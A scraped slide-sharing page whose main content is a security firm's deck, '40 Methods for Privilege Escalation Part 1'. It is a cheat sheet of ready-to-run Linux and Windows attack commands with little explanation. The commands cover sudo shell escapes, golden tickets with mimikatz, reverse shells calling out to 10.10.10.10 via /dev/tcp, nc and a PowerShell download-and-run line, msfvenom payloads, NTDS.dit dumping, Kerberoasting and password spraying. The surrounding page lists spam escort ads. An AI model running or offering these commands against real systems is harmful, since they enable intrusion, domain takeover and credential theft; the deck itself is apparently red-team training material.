2011-03 Developing Windows Exploits 2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Chef - industrialize and automate your infrastructure
Chef - industrialize and automate your infrastructureChef - industrialize and automate your infrastructure
Chef - industrialize and automate your infrastructure
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to Android
 
PHP selber bauen
PHP selber bauenPHP selber bauen
PHP selber bauen
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
 

Recently uploaded

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 

Recently uploaded (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 

40 Methods for Privilege Escalation Part 1

  • 1. 40 METHODS FOR PRIVILEGE ESCALATION PART 1 HADESS | SECURE AGILE DEVELOPMENT WWW.HADESS.IO
  • 2. Domain: No Local Admin: Yes OS: Linux Type: Abusing Privileged Files sudo vim -c ':!/bin/bash' sudo find / etc/passwd -exec /bin/bash ; echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap -- script=/tmp/shell.nse sudo env /bin/bash sudo awk 'BEGIN {system("/bin/bash")}' sudo perl -e 'exec "/bin/bash";' sudo python -c 'import pty;pty.spawn("/bin/bash")' sudo less /etc/hosts - !bash sudo man man - !bash sudo ftp - ! /bin/bash Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234 Victim = sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234 echo test > notes.txt sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash" sudo gcc -wrapper /bin/bash,-s . ABUSING SUDO BINARIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 3. Domain: Y/N Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh chmod +x /home/user/systemupdate.sh Wait a while /bin/bash -p id && whoami ABUSING SCHEDULED TASKS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 4. Domain: Yes Local Admin: Yes OS: Windows Type: Abusing Scheduled Tasks 1.mimikatz# token::elevate 2.mimikatz# vault::cred /patch 3.mimikatz# lsadump::lsa /patch 4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator SIDS> /ticket:<OUTPUT TICKET PATH> 5.powercat -l -v -p 443 6.schtasks /create /S DOMAIN /SC Weekly /RU "NT AuthoritySYSTEM" /TN "enterprise" /TR "powershell.exe-c 'iex (iwr http://10.10.10.10/reverse.ps1)'” 7.schtasks /run /s DOMAIN /TN "enterprise” GOLDEN TICKET WITH SCHEDULED TASKS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 5. Domain: No Local Admin: Yes OS: Linux Type: Abusing Capabilities getcap -r / 2>/dev/null /usr/bin/python2.6 = cap_setuid+ep /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' id && whoami getcap -r / 2>/dev/null /usr/bin/perl = cap_setuid+ep /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' id && whoami 1. a. b. c. 2. a. b. c. ABUSING INTERPRETER CAPABILITIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 6. Domain: No Local Admin: Yes OS: Linux Type: Abusing Capabilities getcap -r / 2>/dev/null /usr/bin/tar = cap dac read search+ep /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa /usr/bin/tar -xvf key.tar openssl req -engine /tmp/priv.so /bin/bash -p id && whoami 1. 2. 3. 4. 5. 6. 7. ABUSING BINARY CAPABILITIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 7. Domain: No Local Admin: Yes OS: Windows Type: Abusing Capabilities https://raw.githubusercontent.com/EmpireProject/Empire/master/data /module_source/lateral_movement/Invoke-SQLOSCmd.ps1 . .Heidi.ps1 Invoke-SQLOCmd -Verbose -Command “net localgroup administrators user1 /add” -Instance COMPUTERNAME 1. 2. 3. ABUSING ACTIVESESSIONS CAPABILITIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 8. Domain: Yes Local Admin: Yes OS: Windows Type: Abusing Capabilities 1. . .PowerUpSQL.ps1 2. Get-SQLInstanceLocal -Verbose 3. (Get-SQLServerLinkCrawl -Verbos -Instance "10.10.10.10" -Query 'select * from master..sysservers').customer.query 4. USE "master"; SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF'); execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN><DATABASE NAME>" 5. powershell -ep bypass 6. Import-Module .powercat.ps1 7. powercat -l -v -p 443 -t 10000 8. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF'); execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN><DATABASE NAME>" execute('exec master..xp_cmdshell "10.10.10.10reverse.exe"') at "<DOMAIN> <DATABASE NAME>" 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. ESCALATE WITH TRUSTWORTHY IN SQL SERVER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 9. Domain: Yes Local Admin: Yes OS: Windows Type: Abusing Services ps aux | grep root mysql -u root -p ! chmod +s /bin/bash Exit /bin/bash -p id && whoami 1. 2. 3. 4. 5. 6. ABUSING MYSQL RUN AS ROOT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 10. Domain: No Local Admin: Yes OS: Linux Type: Abusing Services Journalctl !/bin/sh 1. 2. ABUSING JOURNALCTL HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 11. Domain: No Local Admin: Yes OS: Windows Type: Abusing Services . .PowerUp.ps1 Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domainuser1’ 1. 2. ABUSING VDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 12. Domain: No Local Admin: Yes OS: Windows Type: Abusing Services . .PowerUp.ps1 Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domainuser1’ 1. 2. ABUSING BROWSER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 13. Domain: Yes Local Admin: Yes OS: Linux Type: Abusing Services 0. exec ldapmodify -x -w PASSWORD 1. paste this dn: cn=openssh-lpk,cn=schema,cn=config objectClass: olcSchemaConfig cn: openssh-lpk olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey' DESC 'MANDATORY: OpenSSH Public key' EQUALITY octetStringMatch SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 ) olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY DESC 'MANDATORY: OpenSSH LPK objectclass' MAY ( sshPublicKey $ uid ) ) 2. exec ldapmodify -x -w PASSWORD 3. paste this dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC changeType: modify add: objectClass objectClass: ldapPublicKey - add: sshPublicKey sshPublicKey: content of id_rsa.pub - replace: EVIL GROUP ID uidNumber: CURRENT USER ID - replace: EVIL USER ID gidNumber: CURRENT GROUP ID 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. 26. 27. 28. 29. ABUSING LDAP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 14. Domain: Yes Local Admin: Y/N OS: Windows Type: Abusing Services 1.responder -I eth1 -v 2.create Book.url [InternetShortcut] URL=https://facebook.com IconIndex=0 IconFile=attacker_ipnot_found.ico 1. 2. 3. 4. 5. 6. LLMNR POISONING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 15. Domain: Yes Local Admin: Y/N OS: Windows Type: Abusing Services adcspwn.exe --adcs <cs server> --port [local port] --remote [computer] adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local -- output C:Tempcert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local -- username pwnlab.localmranderson --password The0nly0ne! --dc dc.pwnlab.local 1. 2. 3. 4. 5. ABUSING CERTIFICATE SERVICES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 16. Domain: Yes Local Admin: Yes OS: Linux Type: Injection mysql -u root -p mysql> use mysql; mysql> create table admin(line blob); mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so')); mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so'; mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'); 1. 2. 3. 4. 5. 6. 7. MYSQL UDF CODE INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 17. Domain: No Local Admin: Yes OS: Windows Type: Injection 1.SharpImpersonation.exe user:<user> shellcode:<URL> 2.SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser 1. 2. IMPERSONATION TOKEN WITH IMPERSONATELOGGEDONUSER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 18. Domain: No Local Admin: Yes OS: Windows Type: Injection 1.execute-assembly sweetpotato.exe -p beacon.exe 1. IMPERSONATION TOKEN WITH SEIMPERSONTEPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 19. Domain: No Local Admin: Yes OS: Windows Type: Injection 1.EOPLOADDRIVER.exe SystemCurrentControlSetMyService C:UsersUsernameDesktopDriver.sys IMPERSONATION TOKEN WITH SELOADDRIVERPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 20. Domain: No Local Admin: Yes OS: Windows/Linux Type: Enumeration & Hunt locate *.ovpn 1. OPENVPN CREDENTIALS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 21. Domain: No Local Admin: Yes OS: Windows/Linux Type: Enumeration & Hunt history cat /home/<user>/.bash_history cat ~/.bash_history | grep -i passw 1. 2. 3. BASH HISTORY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 22. Domain: No Local Admin: Yes OS: Windows/Linux Type: Sniff tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd=' 1. PACKAGE CAPTURE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 23. Domain: Yes Local Admin: Yes OS: Linux Type: Remote Procedure Calls (RPC) showmount -e <victim_ip> mkdir /tmp/mount mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount cd /tmp/mount cp /bin/bash . chmod +s bash 1. 2. 3. 4. 5. 6. NFS ROOT SQUASHING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 24. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege $user = "megacorpjorden" $folder = "C:Usersadministrator" $acl = get-acl $folder $aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow" $aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions $acl.AddAccessRule($aclrule) set-acl -path $folder -AclObject $acl get-acl $folder | folder 1. 2. 3. 4. 5. 6. 7. 8. ABUSING ACCESS CONTROL LIST HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 25. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege import-module .SeBackupPrivilegeUtils.dll import-module .SeBackupPrivilegeCmdLets.dll Copy-FileSebackupPrivilege z:WindowsNTDSntds.dit C:tempndts.dit 1. 2. 3. ESCALATE WITH SEBACKUPPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 26. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege https://github.com/dievus/printspoofer printspoofer.exe -i -c "powershell -c whoami" 1. 2. ESCALATE WITH SEIMPERSONATEPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 27. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege FIRST: Download https://github.com/FuzzySecurity/Capcom- Rootkit/blob/master/Driver/Capcom.sys Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddri ver.cpp Download https://github.com/tandasat/ExploitCapcom change ExploitCapcom.cpp line 292 TCHAR CommandLine[] = TEXT("C:Windowssystem32cmd.exe"); to TCHAR CommandLine[] = TEXT("C:testshell.exe"); then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe SECOND: 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe 2. .eoploaddriver.exe SystemCurrentControlSetMyService C:testcapcom.sys 3. .ExploitCapcom.exe 4. in msf exec `run` ESCALATE WITH SELOADDRIVERPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 28. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 Import-Module .PowerView_dev.ps1 Set-DomainUserPassword -Identity user1 -verbose Enter-PSSession -ComputerName COMPUTERNAME -Credential “” ESCALATE WITH FORCECHANGEPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 29. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege $pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('DOMAINMASTER USER'), $pass) Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname Set-DomainObject -Credential $creds -Identity USER1 -SET @{serviceprincipalname='none/fluu'} .Rubeus.exe kerberoast /domain:<DOMAIN> ESCALATE WITH GENERICWRITE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 30. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege 1..SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN <USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION" ABUSING GPO HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 31. Domain: Yes Local Admin: Y/N OS: Windows Type: Abuse Ticket 1..Rubeus.exe asktgt /user:<USET>$ /rc4:<NTLM HASH> /ptt 2.klist PASS-THE-TICKET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 32. Domain: Yes Local Admin: Y/N OS: Windows Type: Abuse Ticket 1.mimikatz # lsadump::dcsync /user:<USER> 2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT SECURITY ID> /rce:<NTLM HASH> /id:<USER ID> GOLDEN TICKET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 33. Domain: Yes Local Admin: Y/N OS: Linux/Windows Type: Abuse Channel python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 -- username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"' ABUSING SPLUNK UNIVERSAL FORWARDER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 34. Domain: No Local Admin: Yes OS: Linux Type: Abuse Channel gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true ABUSING GDBUS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 35. Domain: Yes Local Admin: Y/N OS: Windows Type: Abuse Channel Find user in First DC If port 6666 enabled proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666 . mimikatz. exe "privilege:: debug" "sekurlsa:: logonpasswords" "token:: elevate" *lsadump:: secrets* *exit" proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i 10.100.10.100 -P 6666 1. 2. 3. 4. 5. ABUSING TRUSTED DC HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 36. Domain: Yes Local Admin: Y/N OS: Windows Type: NTLM responder -I eth1 -v ntlmrelayx.py … 1. 2. NTLM RELAY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 37. Domain: Yes Local Admin: Y/N OS: Windows Type: NTLM responder -I eth1 -v ./exchangeRelayx.py … 1. 2. EXCHANGE RELAY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 38. Domain: Yes Local Admin: Y/N OS: Windows Type: Dumping 1. priv.txt contain SET CONTEXT PERSISTENT NOWRITERSp add volume c: alias 0xprashantp createp expose %0xprashant% z:p 2. exec with diskshadow /s priv.txt DUMPING WITH DISKSHADOW HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 39. Domain: Yes Local Admin: Y/N OS: Windows Type: Dumping vssadmin create shadow /for=C: copy ? GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSNTDS.dit C:ShadowCopy copy ? GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYS TEM C:ShadowCopy./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 DUMPING WITH VSSADMIN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 40. Domain: Yes Local Admin: Y/N OS: Windows Type: Spraying ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 PASSWORD SPRAYING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 41. Domain: Yes Local Admin: Y/N OS: Windows Type: Kerberos .Rubeus.exe asreproast AS-REP ROASTING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 42. Domain: Yes Local Admin: Y/N OS: Windows Type: Kerberos GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -- kerberoast output.txt KERBEROASTING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 43. HADESS | SECURE AGILE DEVELOPMENT About Hadess Savior of your Business to combat cyber threats Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats. Contact Us To request additional information about Hadess’s services, please fill out the form below. A Hadess representative will contact you shortly. Email: Marketing@hadess.io Phone No. +989362181112 Company No. +982128427515 +982177873383 Website: www.hadess.io hadess_security
  • 44. HADESS | SECURE AGILE DEVELOPMENT Hadess Products and Services Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Penetration Testing | PROTECTION PRO Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Red Teaming Operation | PROTECTION PRO Identifying and helping to address hidden weaknesses in your organization’s security. RASP | Protect Applications and APIs Anywhere Identifying and helping to address hidden weaknesses in your Applications. SAST | Audit Your Products